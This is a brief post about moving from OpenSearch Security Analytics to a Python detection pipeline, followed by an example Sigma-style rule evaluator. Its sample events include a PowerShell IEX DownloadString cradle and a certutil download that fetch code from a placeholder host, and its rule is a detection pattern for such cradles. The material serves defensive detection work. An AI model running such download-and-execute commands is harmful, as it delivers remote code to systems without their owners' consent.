Using Security Analytics is hard, mostly because of a lack of documentation

To be honest, I have given up on the SA module for now. We are using OpenSearch as the data store and are doing detection with a simple Python framework. I want to use the setup of another university in the Netherlands to use Sigma rules, but from a Python pipeline as well. For case management we are looking into TheHive.

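To make the "Sigma rules from a Python pipeline" idea concrete, here is an added example (not the poster's framework, not pySigma, and not the OpenSearch Security Analytics plugin). It evaluates a hand-written subset of Sigma's detection syntax (field selections with `|contains`, `|startswith`, `|endswith` modifiers, list values as OR within a field, and `and` / `or` / `not` in the condition) over constructed JSON events shaped like OpenSearch documents with ECS-style field names. The rule, the field names and the events are all assumptions made for the illustration; a production pipeline would use pySigma to parse real YAML rules and would read events from OpenSearch instead of a list.

```python
"""Minimal Sigma-style rule evaluator for a Python detection pipeline.

Added example, not code from the original post. It supports only a subset of
Sigma: field selections with the contains/startswith/endswith modifiers,
plain values with * and ? wildcards, lists of values (OR), and conditions
built from selection names with 'and', 'or' and 'not' (no parentheses).
"""
import fnmatch
from typing import Any, Dict, Iterable, List, Optional

# Constructed rule written as a dict rather than YAML so it runs without PyYAML.
RULE = {
    "title": "Suspicious PowerShell download cradle",
    "detection": {
        "selection": {
            "process.name|endswith": "powershell.exe",
            "process.command_line|contains": ["DownloadString", "IEX", "Invoke-Expression"],
        },
        # Hypothetical allow-listed service account that legitimately runs IEX.
        "filter": {"user.name": "svc_patching"},
        "condition": "selection and not filter",
    },
}

# Constructed events using ECS-style dotted fields, as OpenSearch would return them.
EVENTS = [
    {"event": {"id": "evt-1"}, "user": {"name": "alice"},
     "process": {"name": "powershell.exe",
                 "command_line": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                                 ".DownloadString('http://example.invalid/a.ps1')\""}},
    {"event": {"id": "evt-2"}, "user": {"name": "svc_patching"},
     "process": {"name": "powershell.exe",
                 "command_line": "powershell -c IEX (Get-Content C:\\patch\\run.ps1)"}},
    {"event": {"id": "evt-3"}, "user": {"name": "bob"},
     "process": {"name": "cmd.exe",
                 "command_line": "cmd /c certutil -urlcache -f http://example.invalid/x DownloadString"}},
    {"event": {"id": "evt-4"}, "user": {"name": "alice"},
     "process": {"name": "powershell.exe", "command_line": "powershell -c Get-Process"}},
]


def get_field(event: Dict[str, Any], path: str) -> Any:
    """Resolve a dotted field path such as 'process.name' in a nested event."""
    cur: Any = event
    for part in path.split("."):
        if not isinstance(cur, dict) or part not in cur:
            return None
        cur = cur[part]
    return cur


def value_matches(actual: Any, expected: Any, modifier: Optional[str]) -> bool:
    """Compare one field value with one rule value (case-insensitive, as in Sigma)."""
    if actual is None:
        return False
    a, e = str(actual).lower(), str(expected).lower()
    if modifier == "contains":
        return e in a
    if modifier == "startswith":
        return a.startswith(e)
    if modifier == "endswith":
        return a.endswith(e)
    if modifier is None:
        return fnmatch.fnmatchcase(a, e)  # plain values may use * and ? wildcards
    raise ValueError(f"unsupported modifier: {modifier}")


def selection_matches(event: Dict[str, Any], selection: Dict[str, Any]) -> bool:
    """Every field clause must hold (AND); a list of values for one field is OR."""
    for key, expected in selection.items():
        field, _, modifier = key.partition("|")
        values = expected if isinstance(expected, list) else [expected]
        actual = get_field(event, field)
        if not any(value_matches(actual, v, modifier or None) for v in values):
            return False
    return True


def eval_condition(condition: str, results: Dict[str, bool]) -> bool:
    """Tiny recursive-descent evaluator: or-expr > and-expr > not-expr > name."""
    tokens = condition.split()
    pos = 0

    def peek() -> Optional[str]:
        return tokens[pos] if pos < len(tokens) else None

    def take() -> str:
        nonlocal pos
        tok = tokens[pos]
        pos += 1
        return tok

    def parse_not() -> bool:
        if peek() == "not":
            take()
            return not parse_not()
        name = take()
        if name not in results:
            raise ValueError(f"unknown selection in condition: {name}")
        return results[name]

    def parse_and() -> bool:
        left = parse_not()
        while peek() == "and":
            take()
            right = parse_not()
            left = left and right
        return left

    def parse_or() -> bool:
        left = parse_and()
        while peek() == "or":
            take()
            right = parse_and()
            left = left or right
        return left

    result = parse_or()
    if pos != len(tokens):
        raise ValueError(f"trailing tokens in condition: {tokens[pos:]}")
    return result


def run_rule(rule: Dict[str, Any], events: Iterable[Dict[str, Any]]) -> List[str]:
    """Return the event ids that satisfy the rule's detection block."""
    det = rule["detection"]
    selections = {k: v for k, v in det.items() if k != "condition"}
    hits = []
    for ev in events:
        results = {name: selection_matches(ev, sel) for name, sel in selections.items()}
        if eval_condition(det["condition"], results):
            hits.append(ev["event"]["id"])
    return hits


if __name__ == "__main__":
    # Only evt-1 should fire: evt-2 is excluded by the filter, evt-3 is not
    # PowerShell, evt-4 has no download-cradle keyword in its command line.
    print(RULE["title"], "->", run_rule(RULE, EVENTS))
```

The point of the filter selection is the part that usually bites in practice: a rule that matches on `IEX` alone will page on every patching script, so the allow-list lives in the rule where it is reviewed with it, not in an ad-hoc suppression in the alerting layer. Swap `EVENTS` for a page of `_source` documents from an OpenSearch search and the evaluator works unchanged.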
